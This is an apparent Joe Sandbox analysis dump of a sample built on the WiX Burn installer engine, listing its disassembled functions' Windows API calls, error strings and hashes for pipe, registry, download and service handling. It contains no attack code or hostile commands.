                                                                                                                                                                  • Opcode ID: 21c670860232efdaa59ddff5fd26ee63262233af8afa8fe1d11453a3014da05c
                                                                                                                                                                  • Instruction ID: a814c77a83853665580895b88d9ffd5e10eabc0da441fecab4d09ba1453bc034
                                                                                                                                                                  • Opcode Fuzzy Hash: 21c670860232efdaa59ddff5fd26ee63262233af8afa8fe1d11453a3014da05c
                                                                                                                                                                  • Instruction Fuzzy Hash: 7881F536A44218FBDF05DB94CC0AFAE7779EF84B24F118199F519AB2D0EB709A40DB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(0001C580,009173DE,00000000,00916CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092C320
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092C32B
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 0092C357
                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0092C368
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C372
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0092C39E
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 0092C3CF
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C4BB
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092C4F2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNamedPipe$HandleState$ConnectCurrentProcessSleeplstrlen
                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 3141773871-2019809298
                                                                                                                                                                  • Opcode ID: e561e94f82e78c97e16f89dc6cdc234fede3f7433451dff177443159e4b7ddd5
                                                                                                                                                                  • Instruction ID: 86c4cda7859ffe44981f86c631c969cfca794780cd4c4cfe53f89f6e82019060
                                                                                                                                                                  • Opcode Fuzzy Hash: e561e94f82e78c97e16f89dc6cdc234fede3f7433451dff177443159e4b7ddd5
                                                                                                                                                                  • Instruction Fuzzy Hash: D651E5B2E40239BBD710EA949C89FFF79A8AB48B14F114529FE05FB290D674DC0197E1
APIs
• SysFreeString.OLEAUT32(?), ref: 00927456
  • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
  • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
• SysFreeString.OLEAUT32(?), ref: 00927400
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: FreeHeapString$AllocateProcess
• String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix4\wix4\src\burn\engine\registration.cpp
• API String ID: 336948655-1873729996
• Opcode ID: 711c5c02a74afe884496a957ee1250cda7b5fe4d5e97fb8681d0a0de2215e377
• Instruction ID: f1a7b9f8248a586a21890b32188fd9f59aa1f1a6c75351c88c2ed826d71f3f26
• Instruction Fuzzy Hash: DC812A71B44324FBDB10EA909C4AFAFBB79AFC4B11F214068FA15BB2D1D6B0AD409754
APIs
• GetTempFileNameW.KERNEL32(00000000,000000F6,?,00000000,00000000,00000104,00000000,7FFFFFFF,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 00914C12
• GetLastError.KERNEL32 ref: 00914C20
• CreateFileW.KERNEL32(?,40000000,00000005,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000000,?), ref: 00914CB8
• GetLastError.KERNEL32 ref: 00914CC5
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorFileLast$CreateNameTemp
• String ID: %ls%x.TMP$Failed to allocate buffer for GetTempFileNameW.$Failed to allocate memory for file template.$Failed to allocate temp file name.$Failed to copy temp file string.$Failed to create file: %ls$Failed to create new temp file name.$Failed to create temp file.$Failed to get length of path to prefix.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
• API String ID: 2316751675-672087311
• Opcode ID: 5982eccf2df46c403ad870d21194ddbaa2747c412bde4cc784f6cffc92b8e978
• Instruction ID: 96b6f54e6f6804e71bc2dc800c6209a6aaf16501fa267eab4027345067d07967
• Instruction Fuzzy Hash: 8C516B32B8132D76DF311A549C0BFEF3D68DF89B20F114224BE28BE1D1E6B09D909690
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000001,?,?,00940D82,00951FD9,8000FFFF,00916DA2,00000008,00000000,00000000,?,?,8000FFFF,-000000AB), ref: 00955BB6
• GetProcessId.KERNEL32(?,00000000,?,00000001,08000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955CDD
  • Part of subcall function 0092C2ED: lstrlenW.KERNEL32(0001C580,009173DE,00000000,00916CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092C320
  • Part of subcall function 0092C2ED: GetCurrentProcessId.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092C32B
  • Part of subcall function 0092C2ED: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000), ref: 0092C357
  • Part of subcall function 0092C2ED: ConnectNamedPipe.KERNEL32(?,00000000), ref: 0092C368
  • Part of subcall function 0092C2ED: GetLastError.KERNEL32 ref: 0092C372
  • Part of subcall function 0092C2ED: Sleep.KERNEL32(00000064), ref: 0092C39E
  • Part of subcall function 0092C2ED: SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 0092C3CF
• CloseHandle.KERNEL32(00000000,?,000000FF,00940D82,?,00955B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955D7A
• CloseHandle.KERNEL32(00000000,?,000000FF,00940D82,?,00955B00,8000FFFF,00000008,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 00955D8D
Strings
• Failed to wait for embedded process to connect to pipe., xrefs: 00955CFC
• Failed to append embedded args., xrefs: 00955C5E
• %ls -%ls %ls %ls %u, xrefs: 00955C4A
• Failed to append user args., xrefs: 00955C8F
• Failed to wait for embedded executable: %ls, xrefs: 00955D55
• Failed to create embedded pipe name and client token., xrefs: 00955BF8
• %ls, xrefs: 00955C7B
• Failed to process messages from embedded message., xrefs: 00955D2B
• Failed to create embedded process at path: %ls, xrefs: 00955CC6
• burn.embedded, xrefs: 00955C42
• Failed to create embedded pipe., xrefs: 00955C27
• d:\a\wix4\wix4\src\burn\engine\embedded.cpp, xrefs: 00955C07, 00955D64
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Handle$NamedPipeProcess$CloseCurrentState$ConnectErrorLastSleeplstrlen
• String ID: %ls$%ls -%ls %ls %ls %u$Failed to append embedded args.$Failed to append user args.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$d:\a\wix4\wix4\src\burn\engine\embedded.cpp
• API String ID: 732280565-1736165384
• Opcode ID: 9c3badbab294d20a6d81b5164a1bd392531bd692b505bbbe786c224511f287bd
• Instruction ID: 8c674e07d5f91709090b3f4e24f14063d1866dd31290f5c18a2da26017a3128f
• Instruction Fuzzy Hash: 0E511832A80B29BBDF22DB95DD0BFDE7BB4AF08B11F110111FA04BA1D1D3B499548B90
APIs
• RegisterClassW.USER32(?), ref: 0093D3C1
• GetLastError.KERNEL32 ref: 0093D3CC
• CreateWindowExW.USER32(08000000,009922B4,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0093D439
• GetLastError.KERNEL32 ref: 0093D445
• ShowWindow.USER32(00000000,00000008), ref: 0093D486
• SetEvent.KERNEL32(?), ref: 0093D497
• IsDialogMessageW.USER32(?,?), ref: 0093D4AB
• TranslateMessage.USER32(?), ref: 0093D4B9
• DispatchMessageW.USER32(?), ref: 0093D4C3
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093D4D0
• UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0093D508
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Message$ClassErrorLastWindow$CreateDialogDispatchEventRegisterShowTranslateUnregister
• String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$d:\a\wix4\wix4\src\burn\engine\uithread.cpp
• API String ID: 1467104317-2033051560
• Opcode ID: 2e7a77e416db00d974f18533f2b0a4d1bbc75b1cf6e5edafda738ecc8f86fc4d
• Instruction ID: bc1f753a30ab9d2abfe935acd43bbbd655351cf5bf48e151f856e4b46099444a
• Instruction Fuzzy Hash: F141C473D45224BBDB208B949C0DFDEBAB8EF48750F108055F919BB290E774A940CFA0
APIs
• CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00977817
• GetLastError.KERNEL32 ref: 00977825
• VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00977883
• GetLastError.KERNEL32 ref: 00977892
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00977B0C
• CloseHandle.KERNEL32(?), ref: 00977B1B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
• String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 2028584396-2838033101
• Opcode ID: d97ee4c2dd366afc7b03353fb5faa0d4344b853f1a0dddf0a056e9a16ff15462
• Instruction ID: 40ccdbfc5ec85d203c393c44c9be91f706d900353a239d13a0ad583c2293ec34
                                                                                                                                                                  • Opcode Fuzzy Hash: d97ee4c2dd366afc7b03353fb5faa0d4344b853f1a0dddf0a056e9a16ff15462
                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA18472E44219BBDB119FD4CC45FEEFAB9AF48714F158515FA18B7280E7708D409BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00917162,00916DEA,00000000,C95B5EC6,?,?,7D8B5756,?,00916CF2,00000000,00000000,00916DEA,00917162,878D5010,00916CF2), ref: 00921737
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to query registry key value., xrefs: 009215C3
                                                                                                                                                                  • Failed to format value string., xrefs: 009214FB
                                                                                                                                                                  • Failed to set variable., xrefs: 009216E9
                                                                                                                                                                  • Failed to read registry value., xrefs: 0092169A
                                                                                                                                                                  • Failed to change value type., xrefs: 009216C0
                                                                                                                                                                  • Failed to open registry key., xrefs: 00921550
                                                                                                                                                                  • Failed to format key string., xrefs: 009214C9
                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 00921613
                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0092156E
                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 009215AC
                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0092170F
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 009215FF, 0092160A, 00921625, 009216FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to change value type.$Failed to format key string.$Failed to format value string.$Failed to open registry key.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                  • API String ID: 3535843008-3422224897
                                                                                                                                                                  • Opcode ID: 031a478874492fe75b5fc7c172303548a0a1e4ea5bc81a58fc004e3f7e21606c
                                                                                                                                                                  • Instruction ID: 02047758a3fcc4cdd24f3cc158b76134f3f40a20452a963a613d9d7e80efc25d
                                                                                                                                                                  • Opcode Fuzzy Hash: 031a478874492fe75b5fc7c172303548a0a1e4ea5bc81a58fc004e3f7e21606c
                                                                                                                                                                  • Instruction Fuzzy Hash: 98813632E4062EBBDF12AEA0DD46FEEBA7DAF54704F110161F601B6190E3759E609B90
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094972C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 0094973B
                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 00949795
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497A1
                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497E9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00949D0A,?,?,?), ref: 009497F3
                                                                                                                                                                    • Part of subcall function 009498F9: ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00949898,00000000,00000003), ref: 00949910
                                                                                                                                                                    • Part of subcall function 009498F9: GetLastError.KERNEL32(?,00949898,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,00949D0A,?), ref: 0094991A
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 009498D5
                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 009498E0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Service$ErrorLast$CloseHandleOpen$ChangeConfigManagerQueryStatus
                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                                                  • API String ID: 2017831661-2546018573
                                                                                                                                                                  • Opcode ID: f7e65b7fc3d50ad807bb803c39503c39abd9d8d94acd8822a83eaf1387565674
                                                                                                                                                                  • Instruction ID: e18f055d8ef1ae70866203c8f60f9b8689c4af65ccba6cd7850d8cf9786a1d6e
                                                                                                                                                                  • Opcode Fuzzy Hash: f7e65b7fc3d50ad807bb803c39503c39abd9d8d94acd8822a83eaf1387565674
                                                                                                                                                                  • Instruction Fuzzy Hash: 9351E732F80324B7D7219B988C49FEF7AB89B8AB14F154164FE05BB381D675DC4086A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 0091446B
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0091447A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00914484
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 009144C9
                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000105,?,?,?), ref: 00914509
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?), ref: 00914517
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00914525
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 009145B4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$FileModuleName
                                                                                                                                                                  • String ID: Failed to allocate space for module path.$Failed to get max length of input buffer.$Failed to get path for executing process.$Failed to get size of path for executing process.$Failed to re-allocate more space for module path.$Unexpected failure getting path for executing process.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                  • API String ID: 1026760046-3511924
                                                                                                                                                                  • Opcode ID: bfdc683f40f8be7becb38ff37f39a5ab950409593a1098e1d0b17d36e4aafacc
                                                                                                                                                                  • Instruction ID: d61f4c8d0bd3588b444f8b2c12559683e1a0259d1185aa348a05a44b2275441f
                                                                                                                                                                  • Opcode Fuzzy Hash: bfdc683f40f8be7becb38ff37f39a5ab950409593a1098e1d0b17d36e4aafacc
                                                                                                                                                                  • Instruction Fuzzy Hash: 03412673B402287BE7215B589C4AFEF6AADEB49B50F114060FE14FB191E2748D8097A1
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916CF2,00916CF2,009331C1,00000000,00916CF2,009331C1,00000000,00000001,00000000,00020019,00916CF2,009331C1,009331C1,00020019,00000000,00916CF2), ref: 00975B9C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916CF2,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975C87
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975C98
                                                                                                                                                                  • RegCloseKey.ADVAPI32(009331C1,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975CA9
                                                                                                                                                                    • Part of subcall function 0096CC5E: RegQueryInfoKeyW.ADVAPI32(?,009271DB,00916DEA,00917162,00916EDE,80000002,SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations,00020019,00000000,00916DEA,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations2,00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager), ref: 0096CC85
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get the number of values under the dependency "%ls"., xrefs: 00975C09
                                                                                                                                                                  • Failed to delete the dependents subkey under the dependency "%ls"., xrefs: 00975BD9
                                                                                                                                                                  • Failed to open root registry key "%ls"., xrefs: 00975A34
                                                                                                                                                                  • Failed to delete the dependency "%ls"., xrefs: 00975C62
                                                                                                                                                                  • Failed to get the number of dependent subkeys under the dependency "%ls"., xrefs: 00975B77
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975A43, 00975B49
                                                                                                                                                                  • Failed to open the dependents subkey under the dependency "%ls"., xrefs: 00975AE9
                                                                                                                                                                  • Failed to delete the dependent "%ls" under the dependency "%ls"., xrefs: 00975B3A
                                                                                                                                                                  • Failed to open the registry key for the dependency "%ls"., xrefs: 00975A95
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$InfoQuery
                                                                                                                                                                  • String ID: Failed to delete the dependency "%ls".$Failed to delete the dependent "%ls" under the dependency "%ls".$Failed to delete the dependents subkey under the dependency "%ls".$Failed to get the number of dependent subkeys under the dependency "%ls".$Failed to get the number of values under the dependency "%ls".$Failed to open root registry key "%ls".$Failed to open the dependents subkey under the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 852846383-1164676106
                                                                                                                                                                  • Opcode ID: 810caa8171648681d9a96d1cd82e854b07c834b2aaba68815a465e4b5c8df807
                                                                                                                                                                  • Instruction ID: 2dafffd78d249dfeec66acf14259f22a6d64b44926c0425115656a0513725632
                                                                                                                                                                  • Opcode Fuzzy Hash: 810caa8171648681d9a96d1cd82e854b07c834b2aaba68815a465e4b5c8df807
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E710933E40B29FBDB725E948C8AF7F7A6C9B40710F1B8679B949BA150D2B48D40D6D0
APIs
  • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
  • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
• SysFreeString.OLEAUT32(00000000), ref: 0097AB27
• SysFreeString.OLEAUT32(00000000), ref: 0097AB36
• SysFreeString.OLEAUT32(00000000), ref: 0097AB45
Strings
• Failed to get unknown element name., xrefs: 0097A9BA
• Failed to enumerate all attributes on ATOM unknown element., xrefs: 0097AADE
• Failed to allocate ATOM unknown element name., xrefs: 0097A9DF
• Failed to allocate ATOM unknown element namespace., xrefs: 0097A968
• Failed get attributes on ATOM unknown element., xrefs: 0097AA59
• Failed to get unknown element value., xrefs: 0097AA03
• Failed to parse attribute on ATOM unknown element., xrefs: 0097AAF2
